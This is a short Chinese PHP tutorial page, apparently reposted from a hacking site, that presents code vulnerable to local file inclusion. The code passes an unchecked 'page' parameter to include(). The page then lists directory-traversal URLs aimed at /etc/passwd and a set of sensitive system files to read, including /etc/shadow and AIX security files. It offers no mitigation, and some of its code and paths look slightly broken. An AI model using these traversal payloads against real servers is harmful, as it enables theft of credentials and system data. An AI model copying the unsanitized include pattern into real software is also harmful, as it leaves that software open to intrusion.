• 技术文章 >后端开发 >php教程

    php 伪造本地文件包含漏洞的代码_PHP

    2016-06-01 12:14:46原创377
    代码:
    复制代码 代码如下:
    $page=$_GET['page'];
    include($page.'php');
    ?>

    你可以这样使用
    http://www.xxx.com/index.php?page=../etc/passwd
    http://www.xxx.com/index.php?page=../../../etc/passwd
    http://www.xxx.com/index.php?page=..../../etc/passwd

    获取更多数据:
    etc/profile
    etc/services
    /etc/passwd
    /etc/shadow
    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /usr/lib/security/mkuser.default

    来自hackteach
    声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
    专题推荐:包含漏洞
    上一篇:求PHP数组最大值,最小值的代码_PHP 下一篇:使用PHPRPC实现Ajax安全登录_PHP
    PHP编程就业班

    相关文章推荐

    • PHP XDebug扩充• 这类mp3途径是什么• !帮小弟我看看这个娶图函数到底出错在哪• 搞了两天,没有弄成,宣布失败,求高手帮忙!• thinkphp 没选择上传文件

    全部评论我要评论

  • 取消发布评论发送
    • 1/1

    PHP中文网

    首页 首页课程 课程文章文章问答 问答博客博客词典 词典手册 手册资源 资源搜索 搜索APP下载 APP下载